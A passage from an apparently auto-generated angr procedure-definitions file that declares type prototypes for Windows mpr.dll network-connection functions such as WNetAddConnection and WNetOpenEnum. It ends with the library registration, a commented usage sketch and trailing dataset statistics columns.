'WNetAddConnection4A': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions"]),
#
'WNetAddConnection4W': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions"]),
#
'WNetCancelConnectionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "fForce"]),
#
'WNetCancelConnectionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "fForce"]),
#
'WNetCancelConnection2A': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "dwFlags", "fForce"]),
#
'WNetCancelConnection2W': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "dwFlags", "fForce"]),
#
'WNetGetConnectionA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalName", "lpRemoteName", "lpnLength"]),
#
'WNetGetConnectionW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalName", "lpRemoteName", "lpnLength"]),
#
'WNetUseConnectionA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="NET_USE_CONNECT_FLAGS"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserId", "dwFlags", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetUseConnectionW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="NET_USE_CONNECT_FLAGS"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "lpPassword", "lpUserId", "dwFlags", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetUseConnection4A': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetUseConnection4W': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwndOwner", "lpNetResource", "pAuthBuffer", "cbAuthBuffer", "dwFlags", "lpUseOptions", "cbUseOptions", "lpAccessName", "lpBufferSize", "lpResult"]),
#
'WNetConnectionDialog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwnd", "dwType"]),
#
'WNetDisconnectDialog': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hwnd", "dwType"]),
#
'WNetConnectionDialog1A': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpConnRes": SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), "dwFlags": SimTypeInt(signed=False, label="CONNECTDLGSTRUCT_FLAGS"), "dwDevNum": SimTypeInt(signed=False, label="UInt32")}, name="CONNECTDLGSTRUCTA", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetConnectionDialog1W': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpConnRes": SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), "dwFlags": SimTypeInt(signed=False, label="CONNECTDLGSTRUCT_FLAGS"), "dwDevNum": SimTypeInt(signed=False, label="UInt32")}, name="CONNECTDLGSTRUCTW", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetDisconnectDialog1A': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "dwFlags": SimTypeInt(signed=False, label="DISCDLGSTRUCT_FLAGS")}, name="DISCDLGSTRUCTA", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetDisconnectDialog1W': SimTypeFunction([SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "hwndOwner": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwFlags": SimTypeInt(signed=False, label="DISCDLGSTRUCT_FLAGS")}, name="DISCDLGSTRUCTW", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpConnDlgStruct"]),
#
'WNetOpenEnumA': SimTypeFunction([SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), SimTypeInt(signed=False, label="WNET_OPEN_ENUM_USAGE"), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwScope", "dwType", "dwUsage", "lpNetResource", "lphEnum"]),
#
'WNetOpenEnumW': SimTypeFunction([SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), SimTypeInt(signed=False, label="WNET_OPEN_ENUM_USAGE"), SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwScope", "dwType", "dwUsage", "lpNetResource", "lphEnum"]),
#
'WNetEnumResourceA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum", "lpcCount", "lpBuffer", "lpBufferSize"]),
#
'WNetEnumResourceW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum", "lpcCount", "lpBuffer", "lpBufferSize"]),
#
'WNetCloseEnum': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum"]),
#
'WNetGetResourceParentA': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer"]),
#
'WNetGetResourceParentW': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer"]),
#
'WNetGetResourceInformationA': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer", "lplpSystem"]),
#
'WNetGetResourceInformationW': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpBuffer", "lpcbBuffer", "lplpSystem"]),
#
'WNetGetUniversalNameA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UNC_INFO_LEVEL"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalPath", "dwInfoLevel", "lpBuffer", "lpBufferSize"]),
#
'WNetGetUniversalNameW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UNC_INFO_LEVEL"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpLocalPath", "dwInfoLevel", "lpBuffer", "lpBufferSize"]),
#
'WNetGetUserA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "lpUserName", "lpnLength"]),
#
'WNetGetUserW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpName", "lpUserName", "lpnLength"]),
#
'WNetGetProviderNameA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwNetType", "lpProviderName", "lpBufferSize"]),
#
'WNetGetProviderNameW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwNetType", "lpProviderName", "lpBufferSize"]),
#
'WNetGetNetworkInformationA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwProviderVersion": SimTypeInt(signed=False, label="UInt32"), "dwStatus": SimTypeBottom(label="WIN32_ERROR"), "dwCharacteristics": SimTypeInt(signed=False, label="NETINFOSTRUCT_CHARACTERISTICS"), "dwHandle": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "wNetType": SimTypeShort(signed=False, label="UInt16"), "dwPrinters": SimTypeInt(signed=False, label="UInt32"), "dwDrives": SimTypeInt(signed=False, label="UInt32")}, name="NETINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpProvider", "lpNetInfoStruct"]),
#
'WNetGetNetworkInformationW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwProviderVersion": SimTypeInt(signed=False, label="UInt32"), "dwStatus": SimTypeBottom(label="WIN32_ERROR"), "dwCharacteristics": SimTypeInt(signed=False, label="NETINFOSTRUCT_CHARACTERISTICS"), "dwHandle": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "wNetType": SimTypeShort(signed=False, label="UInt16"), "dwPrinters": SimTypeInt(signed=False, label="UInt32"), "dwDrives": SimTypeInt(signed=False, label="UInt32")}, name="NETINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpProvider", "lpNetInfoStruct"]),
#
'WNetGetLastErrorA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpError", "lpErrorBuf", "nErrorBufSize", "lpNameBuf", "nNameBufSize"]),
#
'WNetGetLastErrorW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpError", "lpErrorBuf", "nErrorBufSize", "lpNameBuf", "nNameBufSize"]),
#
'MultinetGetConnectionPerformanceA': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="NETRESOURCEA", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "dwSpeed": SimTypeInt(signed=False, label="UInt32"), "dwDelay": SimTypeInt(signed=False, label="UInt32"), "dwOptDataSize": SimTypeInt(signed=False, label="UInt32")}, name="NETCONNECTINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpNetConnectInfoStruct"]),
#
'MultinetGetConnectionPerformanceW': SimTypeFunction([SimTypePointer(SimStruct({"dwScope": SimTypeInt(signed=False, label="NET_RESOURCE_SCOPE"), "dwType": SimTypeInt(signed=False, label="NET_RESOURCE_TYPE"), "dwDisplayType": SimTypeInt(signed=False, label="UInt32"), "dwUsage": SimTypeInt(signed=False, label="UInt32"), "lpLocalName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpRemoteName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpComment": SimTypePointer(SimTypeChar(label="Char"), offset=0), "lpProvider": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="NETRESOURCEW", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbStructure": SimTypeInt(signed=False, label="UInt32"), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "dwSpeed": SimTypeInt(signed=False, label="UInt32"), "dwDelay": SimTypeInt(signed=False, label="UInt32"), "dwOptDataSize": SimTypeInt(signed=False, label="UInt32")}, name="NETCONNECTINFOSTRUCT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["lpNetResource", "lpNetConnectInfoStruct"]),
#
'WNetSetLastErrorA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeBottom(label="Void"), arg_names=["err", "lpError", "lpProviders"]),
#
'WNetSetLastErrorW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeBottom(label="Void"), arg_names=["err", "lpError", "lpProviders"]),
}
lib.set_prototypes(prototypes)
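# A minimal usage sketch, not part of the generated file (assumptions: importing
# this module registers the library in SIM_LIBRARIES under the name passed to
# set_library_names, and the parsed signatures stay reachable through the
# library's `prototypes` mapping):
#
#   from angr.procedures.definitions import SIM_LIBRARIES
#   mpr = SIM_LIBRARIES['mpr.dll']
#   proto = mpr.prototypes['WNetCancelConnectionA']
#   print(proto.arg_names)  # expected: ['lpName', 'fForce']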
| 281.793103
| 1,365
| 0.743882
| 3,396
| 32,688
| 7.108952
| 0.058304
| 0.16171
| 0.147792
| 0.238008
| 0.937868
| 0.937868
| 0.937536
| 0.937536
| 0.933477
| 0.929418
| 0
| 0.019557
| 0.072412
| 32,688
| 115
| 1,366
| 284.243478
| 0.776656
| 0.000857
| 0
| 0
| 0
| 0
| 0.244503
| 0.019039
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.131148
| 0.081967
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
71650ce7588f84ec9a9c7a6103df071e7316ce7d
| 7,998
|
py
|
Python
|
xiaoqiqi/CMU/scrap_research.py
|
doge-search/webdoge
|
443e758b5c1f962d5c2fe792cdbed01e1208b1cb
|
[
"Unlicense"
] | null | null | null |
xiaoqiqi/CMU/scrap_research.py
|
